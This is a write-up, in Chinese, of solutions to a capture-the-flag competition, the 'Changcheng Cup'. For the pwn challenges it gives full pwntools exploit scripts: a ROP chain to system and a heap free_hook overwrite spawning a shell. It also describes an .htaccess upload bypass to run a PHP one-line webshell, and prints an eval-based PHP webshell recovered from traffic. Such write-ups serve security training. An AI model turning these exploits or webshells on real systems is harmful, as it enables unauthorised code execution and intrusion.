第四届“长城杯”网络安全大赛

Web

SQLUP

爆破得到账号admin 密码1

发现文件上传过滤了字母p

上传.htaccess：AddType application/x-httpd-php .txt 解析.txt为php

传一句话木马

tac /flag得到flag

Pwn

FlowerShop

from pwn import *
from varname import argname

context(arch='amd64', os='linux')
# context.log_level='debug'
file = './pwn'
elf = ELF(file)
p = process(file)
lk = ''.split()
p=remote("8.147.129.22",15172)
context.terminal = ['ssh-gdb-helper']

pr  = print
pa  = lambda      : pause()
re  = lambda m, t : p.recv(numb=m, timeout=t)
ru  = lambda x, y=0    : p.recvuntil(x, drop=y)
rl  = lambda      : p.recvline()
sd  = lambda x    : p.send(x)
sl  = lambda x    : p.sendline(x)
ia  = lambda      : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa  = lambda a, b : p.sendafter(a, b)
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
pv   = lambda x   : success('%s: %s'%(argname('x'), hex(x)))

def lzsl(exp):
    sl(exp)
    sleep(0.3)

padding = 61
sl(b'pwn\x00'*15)

lzsl(b'a')
lzsl(b'a')
lzsl(b'1')

lzsl(b'a')
lzsl(b'1')

lzsl(b'c')
lzsl(b'1')

# gdb.attach(p,"""b *0x000400CC1 if *$rdi != 0
# b *0x0000400CE4
# b *0x0000400A0E
# b *0x00004009FF""")
lzsl(b'b')
# lzsl(b'1')

system_plt = 0x400730
binsh = 0x601840

# 0x0000000000400f13 : pop rdi ; ret
# 0x00000000004006f6 : ret
rdi = 0x400f13
ret = 0x4006f6
padding = 24
exp = flat(
    cyclic(padding),
    ret,
    rdi,
    binsh,
    system_plt
)
assert len(exp) <= 0x46
sl(exp)
ia()

Kylin_Heap

from pwn import *
from varname import argname

context(arch='amd64', os='linux')
context.log_level='debug'
file = './Heap'
elf = ELF(file)
p = process(file)
lk = '8.147.134.24 22923'.split()
# p = remote(lk[0], lk[1])
context.terminal = ['ssh-gdb-helper']

pr  = print
pa  = lambda      : pause()
re  = lambda m, t : p.recv(numb=m, timeout=t)
ru  = lambda x, y=0    : p.recvuntil(x, drop=y)
rl  = lambda      : p.recvline()
sd  = lambda x    : p.send(x)
sl  = lambda x    : p.sendline(x)
ia  = lambda      : p.interactive()
sla = lambda a, b : p.sendlineafter(a, b)
sa  = lambda a, b : p.sendafter(a, b)
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
pv   = lambda x   : success('%s: %s'%(argname('x'), hex(x)))

libc = ELF('./libc.so.6')

def add(size, content):
    sl(b'1')
    ru(b'(1 to 1280 bytes):')
    sl(str(size))
    ru(b'bytes):')
    sl(content)
    sleep(0.5)

def delete(index):
    sl(b'2')
    ru(b'Enter the index (0-19):')
    sl(str(index))
    sleep(0.5)

def show(index):
    sl(b'4')
    ru(b'(0-19):')
    sl(str(index))
    sleep(0.5)

def edit(index, content):
    sl(b'3')
    ru(b'Enter the index (0-19):')
    sl(str(index))
    ru(b'bytes):')
    sl(content)
    sleep(0.5)

add(0x4f0,"aaaa")
add(0x68,"bbbb")
add(0x68,"cccc")
add(0x68,"dddd")
delete(1)
delete(2)
delete(0)
pa()
show(0)
ru("[0]:\n")
libc_base = uu64(re(6,2)) - 0x1ebbe0
edit(2,p64(libc_base+libc.sym['__free_hook']))

add(0x68,"/bin/sh\x00")
add(0x68,p64(libc_base+libc.sym['system']))
pv(libc_base)

# gdb.attach(p)
delete(2)
ia()

Reverse

easyre

enc = [
    0x0A, 0x0D, 0x06, 0x1C, 0x1D, 0x05, 0x05, 0x5F, 0x0D, 0x03, 
    0x04, 0x0A, 0x14, 0x49, 0x05, 0x57, 0x00, 0x1B, 0x19, 0x02, 
    0x01, 0x54, 0x4E, 0x4C, 0x56, 0x00, 0x51, 0x4B, 0x4F, 0x57, 
    0x05, 0x54, 0x55, 0x03, 0x53, 0x57, 0x01, 0x03, 0x07, 0x04, 
    0x4A, 0x77
]

for i in range(len(enc)-1, -1, -1):
    enc[i] ^= enc[(i+1) % len(enc)]

result_string = ''.join([chr(byte) for byte in enc])
print(result_string)

#flag{fcf94739-da66-467c-a77f-b50d12a67437}

Crypto

RandomRSA

通过LCG的递推公式，可以得到：
$$
X_{n+1} = aX_n + b \pmod p \
n = pq = (X_n + \epsilon_1)(aX_{n} + b + \epsilon_2) \
$$

显然这是在
$$
Z^*_p
$$
下关于
$$
X
$$
的 二次方程。如果没有 next_prime 这个函数增加的小量
$$
\epsilon
$$
，那么直接解这个方程就能得到
$$
X
$$
。
但是由于有这两个误差，而经过测试，发现这个误差是完全可预测的，大概在
$$
(0,1000)
$$
这个范围，所以可以利用这个来爆破计算
$$
X
$$
。

var("x1,a,b,e1,e2,n")

f = (x1 + e1)*(a*x1 + b + e2) - n
expand(f)

# a*e1*x1 + a*x1^2 + b*e1 + e1*e2 + b*x1 + e2*x1 - n

即

$$
aX^2 + (b + e_2 + ae_1)X + (be_1 + e_1e_2 - n) = 0 \pmod p
$$
这里可以使用 sagemath 的 roots 进行爆破，但是由于 roots 但是解根的时间是比较久的，所以可以采用求根公式，验证
$$
\Delta = B^2 - 4AC
$$
是否在
$$
Z^*_p
$$
下正好是二次剩余，以减少爆破的次数。

p,a,b = 
n,c = 

for i in range(1000,1,-1):
    flag = False
    for j in range(1000,1,-1):
        A = a
        B = (b + j + a*i)
        C = (b*i + i*j - n)
        delta = B**2 - 4*A*C
        if pow(delta, (p - 1) // 2, p) != 1:
            continue
        roots = Zmod(p)(delta).sqrt(all=True)
        for root in roots:
            root = Integer(root)
            x = (-B + root )*inverse_mod(2*A,p) % p
            if n % (x + i) == 0:
                print(i,j)
                print(x+i)
                flag = True
                break
        if flag:
            break
    if flag:
        break

q = int(a*x + b + j) % p
p = int(x + i)
print(q)
print(p)
assert is_prime(p) and is_prime(q)

d = pow(0x10001,-1,(p-1)*(q-1))
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))

Misc

BrickGame

漏洞探踪，流量解密

根据题目信息和流量包掩码爆破192.168.30.xxx；得到压缩包2的解压密码是192.168.30.234

筛选http流得到RC4hint

逐行查阅http流，找到rec的密文和key

3561373666363735313537366462653161663439333238616131643264326265613136656636326166613361376336313664    #ENC
6264623865323165616365383164356664323163613434356363623335303731  #KEY

最安全的加密方式

导出保存为rar文件

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='25ming@';   #压缩包密码
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

解压得到一堆md5 挨个解密即可

8fa14cdd754f91cc6554c9e71929cce7
2db95e8e1a9267b7a1188556b2013b33
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
f95b70fdc3088560732a5ac135644506
b9ece18c950afbfa6b0fdbfa4ff731d3
2510c39011c5be704182423e3a695e91
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
6f8f57715090da2632453988d9a1501b
cfcd208495d565ef66e7dff9f98764da
03c7c0ace395d80182db07ae2c30f034
e358efa489f58062f10dd7316b65649e
b14a7b8059d9c055954c92674ce60032
c81e728d9d4c2f636f067f89cc14862c
e1671797c52e15f763380b45e841ec32
4a8a08f09d37b73795649038408b5f33
4c614360da93c0a041b22e537de151eb
4b43b0aee35624cd95b910189b3dc231
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
e1671797c52e15f763380b45e841ec32
8d9c307cb7f3c4a32822a51922d1ceaa
4a8a08f09d37b73795649038408b5f33
4b43b0aee35624cd95b910189b3dc231
57cec4137b614c87cb4e24a3d003a3e0
83878c91171338902e0fe0fb97a8c47a
e358efa489f58062f10dd7316b65649e
865c0c0b4ab0e063e5caa3387c1a8741
d95679752134a2d9eb61dbd7b91c4bcc
7b8b965ad4bca0e41ab51de7b31363a1
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
9033e0e305f247c0c3c80d0c7848c8b3
cbb184dd8e05c9709e5dcaedaa0495cf

#flag{The_m0st_2ecUre_eNcrYption!!!}